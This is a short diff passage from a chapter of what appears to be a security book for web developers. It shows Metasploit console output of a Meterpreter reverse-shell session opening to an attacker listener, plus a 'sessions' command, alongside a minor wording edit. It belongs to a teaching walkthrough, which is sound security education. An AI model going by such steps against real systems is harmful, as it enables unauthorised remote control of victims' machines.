holisticinfosec/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

 G> `[*] Meterpreter session 6 opened (<listener-attack-ip>:4444 -> <target-ip>:63814) at 2016-12-28 15:31:29 +1300`
 G> `msf exploit(handler) >`
 G>
-G> Now we have our shell.
+G> We now have a shell.
 Type `sessions` to see its details:
 G>
 G> `msf exploit(handler) > sessions`
 G>